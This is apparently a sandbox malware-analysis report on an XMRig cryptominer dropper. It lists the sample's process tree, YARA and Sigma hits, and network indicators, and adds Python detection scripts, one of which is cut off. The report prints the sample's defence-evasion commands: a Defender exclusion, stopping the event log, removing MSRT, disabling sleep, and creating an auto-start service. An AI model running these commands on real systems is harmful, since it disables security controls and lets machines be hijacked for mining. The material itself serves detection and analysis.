
Windows Analysis Report
WWhhc3A0rs.exe

Overview

General Information

Sample name: WWhhc3A0rs.exe
renamed because original name is a hash value
Original sample name: 197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f.exe
Analysis ID: 1532624
MD5: 5df14b213736e361758fec790bd16721
SHA1: 019592d0ea29dd3037d8b0bd1bd65644aa02c74a
SHA256: 197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f
Tags: exe, user-Chainskilabs

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • WWhhc3A0rs.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\WWhhc3A0rs.exe" MD5: 5DF14B213736E361758FEC790BD16721)
    • powershell.exe (PID: 2304 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 368 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 5916 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5712 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4788 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3700 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4864 cmdline: C:\Windows\system32\sc.exe delete "VKWMZEFB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7156 cmdline: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4568 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5776 cmdline: C:\Windows\system32\sc.exe start "VKWMZEFB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lwmyuxxpdkdz.exe (PID: 6732 cmdline: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe MD5: 5DF14B213736E361758FEC790BD16721)
    • powershell.exe (PID: 5936 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4328 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1280 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 796 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6532 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1008 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6500 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7064 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4328 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found

Yara matches in process memory (Source; Rule; Description; Author; Strings):
Source: 00000026.00000002.3375667988.000001D9F36EA000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
(3 further entries are collapsed in the original report)
Yara matches in unpacked PE (Source; Rule; Description; Author; Strings):
Source: 38.2.conhost.exe.140000000.0.unpack; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: 38.2.conhost.exe.140000000.0.unpack; Rule: MacOS_Cryptominer_Xmrig_241780a1; Description: unknown; Author: unknown
  • 0x370008:$a1: mining.set_target
  • 0x362230:$a2: XMRIG_HOSTNAME
  • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
  • 0x362208:$a4: XMRIG_VERSION
Source: 38.2.conhost.exe.140000000.0.unpack; Rule: MAL_XMR_Miner_May19_1; Description: Detects Monero Crypto Coin Miner; Author: Florian Roth
  • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 38.2.conhost.exe.140000000.0.unpack; Rule: MALWARE_Win_CoinMiner02; Description: Detects coinmining malware; Author: ditekSHen
  • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3b9600:$s3: \\.\WinRing0_
  • 0x3671a8:$s4: pool_wallet
  • 0x3615d8:$s5: cryptonight
  • 0x3615e8:$s5: cryptonight
  • 0x3615f8:$s5: cryptonight
  • 0x361608:$s5: cryptonight
  • 0x361620:$s5: cryptonight
  • 0x361630:$s5: cryptonight
  • 0x361640:$s5: cryptonight
  • 0x361658:$s5: cryptonight
  • 0x361668:$s5: cryptonight
  • 0x361680:$s5: cryptonight
  • 0x361698:$s5: cryptonight
  • 0x3616a8:$s5: cryptonight
  • 0x3616b8:$s5: cryptonight
  • 0x3616c8:$s5: cryptonight
  • 0x3616e0:$s5: cryptonight
  • 0x3616f8:$s5: cryptonight
  • 0x361708:$s5: cryptonight
  • 0x361718:$s5: cryptonight

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5916, ProcessName: powercfg.exe

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2304, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2304, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto", ProcessId: 7156, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2304, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 4328, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4568, ProcessName: sc.exe
No Suricata rule has matched
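The process tree and the Sigma hits above describe one defence-evasion chain: a Defender exclusion for the user profile and ProgramData, sleep and hibernate timeouts zeroed with powercfg, the EventLog service stopped, the Malicious Software Removal Tool (KB890830) uninstalled, and a service persisted out of C:\ProgramData. The following is an added example, not Joe Sandbox code and not part of the original report, showing how an analyst could run equivalent command-line rules over process-creation telemetry. The events are constructed from the command lines in the process tree (plus one benign control); the rule names, the regexes and the "three distinct techniques from a user-writable parent" threshold are my own assumptions, not Sigma rule logic.

```python
"""Process-creation triage for the defence-evasion chain seen in this report.

Added example (not Joe Sandbox code). Events are constructed from the
process tree in the report; rule names and thresholds are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    cmdline: str


# Constructed from the report's process tree (PIDs and command lines as listed
# there); the last event is a constructed benign control that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(2304, r"C:\Users\user\Desktop\WWhhc3A0rs.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
              r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    ProcEvent(2488, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wusa.exe",
              r"wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(5916, r"C:\Users\user\Desktop\WWhhc3A0rs.exe", r"C:\Windows\System32\powercfg.exe",
              r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    ProcEvent(7156, r"C:\Users\user\Desktop\WWhhc3A0rs.exe", r"C:\Windows\System32\sc.exe",
              r'C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= '
              r'"C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"'),
    ProcEvent(4568, r"C:\Users\user\Desktop\WWhhc3A0rs.exe", r"C:\Windows\System32\sc.exe",
              r"C:\Windows\system32\sc.exe stop eventlog"),
    ProcEvent(5776, r"C:\Users\user\Desktop\WWhhc3A0rs.exe", r"C:\Windows\System32\sc.exe",
              r'C:\Windows\system32\sc.exe start "VKWMZEFB"'),
    ProcEvent(9001, r"C:\Windows\explorer.exe", r"C:\Windows\System32\powercfg.exe",
              r"powercfg /list"),  # constructed benign control
]

# (rule name, regex over the command line). One rule per action the report
# shows: Defender exclusion, sleep/hibernate disabled, event log stopped,
# service persisted out of ProgramData, MSRT (KB890830) removed.
RULES = [
    ("defender_exclusion_added",
     r"(?i)\bAdd-MpPreference\b.*-Exclusion(?:Path|Extension|Process)"),
    ("powercfg_timeout_disabled",
     r"(?i)\bpowercfg(?:\.exe)?\s.*-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b"),
    ("eventlog_service_stopped",
     r"(?i)\bsc(?:\.exe)?\s+stop\s+eventlog\b"),
    ("service_created_in_programdata",
     r'(?i)\bsc(?:\.exe)?\s+create\s.*binpath=\s*"?[a-z]:\\programdata\\'),
    ("msrt_uninstalled",
     r"(?i)\bwusa(?:\.exe)?\s.*/uninstall\s.*/kb:890830\b"),
]

# Parent images under these roots should not be driving admin tools at all.
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(?:users|programdata)\\")


def match_event(ev: ProcEvent) -> list[str]:
    """Return the names of every rule whose regex hits the command line."""
    return [name for name, pat in RULES if re.search(pat, ev.cmdline)]


def from_user_writable_parent(ev: ProcEvent) -> bool:
    """True when the parent image lives under C:\\Users or C:\\ProgramData."""
    return bool(USER_WRITABLE.match(ev.parent_image))


def triage(events) -> dict[int, list[str]]:
    """Map PID -> matched rule names, for events that hit at least one rule."""
    hits = {}
    for ev in events:
        names = match_event(ev)
        if names:
            hits[ev.pid] = names
    return hits


def distinct_techniques(events) -> int:
    """How many different rules fired across the whole batch."""
    return len({name for names in triage(events).values() for name in names})


def looks_like_miner_install(events, threshold: int = 3) -> bool:
    """Chain heuristic (assumed threshold): several distinct evasion steps in
    one batch, at least one of them launched from a user-writable parent."""
    suspicious_parent = any(from_user_writable_parent(ev) and match_event(ev)
                            for ev in events)
    return distinct_techniques(events) >= threshold and suspicious_parent


if __name__ == "__main__":
    for pid, names in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(names))
    print("miner-install chain:", looks_like_miner_install(SAMPLE_EVENTS))
```

Each rule on its own is noisy (administrators do run powercfg and sc), which is why the chain heuristic counts distinct techniques and requires a parent outside C:\Windows; in the report every one of these commands is spawned directly by the sample on the user's Desktop or by its copy in C:\ProgramData.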


AV Detection

Source: xmr-eu1.nanopool.org; Virustotal: Detection: 5%
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe; ReversingLabs: Detection: 57%
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe; Virustotal: Detection: 61%
Source: WWhhc3A0rs.exe; ReversingLabs: Detection: 57%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability

Bitcoin Miner

Source: Yara match; File source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000026.00000002.3375667988.000001D9F36EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: conhost.exe PID: 7064, type: MEMORYSTR
Source: unknown; DNS query: name: xmr-eu1.nanopool.org
Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: conhost.exe; String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: WWhhc3A0rs.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr
Source: global traffic; TCP traffic: 192.168.2.6:49713 -> 51.15.65.182:10343
Source: Joe Sandbox View; IP Address: 51.15.65.182
Source: Joe Sandbox View; ASN Name: OnlineSASFR
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr; String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: https://xmrig.com/docs/algorithms
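The network evidence above is thin but characteristic: one DNS query for a mining-pool host (xmr-eu1.nanopool.org), one TCP flow from the injected conhost.exe to 51.15.65.182 on the non-standard port 10343, and stratum+tcp:// strings in memory. The following is an added example, not Joe Sandbox code and not part of the original report, showing how to correlate DNS answers with flow records so that a pool lookup and an odd-port connection to the returned address stack into one high-severity finding. The pool-domain suffix set, the common-port set, and the DNS answer mapping xmr-eu1.nanopool.org to 51.15.65.182 are assumptions for this example; the report shows the query and the flow but does not print the resolution. The flow lines use the report's own "src:port -> dst:port" notation; all but the first are constructed controls.

```python
"""Correlate DNS answers and flow records against mining-pool indicators.

Added example (not Joe Sandbox code). The suffix list, port list and the
DNS answer below are assumptions built from the indicators in this report.
"""
from dataclasses import dataclass

# Assumption: nanopool.org is the only pool suffix this report evidences;
# extend the set from your own threat intelligence.
POOL_DOMAIN_SUFFIXES = {"nanopool.org"}

# Assumption: ports a workstation normally talks to; anything else counts as
# "non-standard", mirroring the report's own signature wording.
COMMON_PORTS = {53, 80, 123, 443, 445, 587, 993}

# Constructed DNS answers. The report shows a query for xmr-eu1.nanopool.org
# and a single TCP flow to 51.15.65.182; tying the two together is an
# assumption for this example, not something the report states.
DNS_LOG = [
    ("xmr-eu1.nanopool.org", "51.15.65.182"),
    ("www.example.com", "93.184.216.34"),  # constructed benign lookup
]

# Flow lines in the report's "src:port -> dst:port" notation; the first is
# copied from the report, the others are constructed controls.
FLOW_LOG = [
    "192.168.2.6:49713 -> 51.15.65.182:10343",
    "192.168.2.6:49720 -> 93.184.216.34:443",
    "192.168.2.6:49721 -> 10.0.0.5:8443",
]


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int


def parse_flow(line: str) -> Flow:
    """Parse 'A:p -> B:q' into a Flow; raise ValueError on anything else."""
    left, arrow, right = line.partition("->")
    if arrow != "->":
        raise ValueError(f"not a flow line: {line!r}")
    src, sport = left.strip().rsplit(":", 1)
    dst, dport = right.strip().rsplit(":", 1)
    return Flow(src, int(sport), dst, int(dport))


def is_pool_domain(name: str) -> bool:
    """True when the query name is, or is a subdomain of, a known pool domain."""
    name = name.lower().rstrip(".")
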